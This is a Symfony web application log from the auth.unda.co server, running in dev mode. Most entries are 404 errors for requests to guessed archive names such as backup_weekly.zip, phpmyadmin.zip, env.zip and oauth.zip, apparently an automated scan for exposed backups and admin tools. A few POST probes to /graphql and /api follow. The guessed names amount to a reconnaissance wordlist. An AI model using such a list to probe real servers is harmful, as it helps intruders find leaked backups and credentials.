[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /testing.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /testing.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mongo.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mongo.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /lib.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /lib.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_yearly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_yearly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /code.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /code.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /release-candidate.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /release-candidate.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administration.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administration.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /tmp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /tmp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /preferences.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /preferences.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /options.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /options.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /toml.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /toml.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /scripts.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /scripts.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webmin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webmin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /management.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /management.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /yarn.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /yarn.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mercurial.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mercurial.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /plesk.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /plesk.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /auth.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /auth.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /environment.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /environment.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpmyadmin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpmyadmin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /adminer.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /adminer.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /jwt.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /jwt.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_weekly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_weekly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administrators.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administrators.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /siteground.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /siteground.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mongodb.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mongodb.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_2.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_2.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ssl.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ssl.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /oauth.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /oauth.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /redis.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /redis.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /oracle.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /oracle.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_1.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_1.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /duplicate.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /duplicate.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /clone.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /clone.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /settings.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /settings.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqlserver.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqlserver.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /copy.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /copy.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /properties.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /properties.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dashboard.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dashboard.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:31:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Archive.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Archive.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:17] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-20 18:39:18] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-20 18:39:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 18:39:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
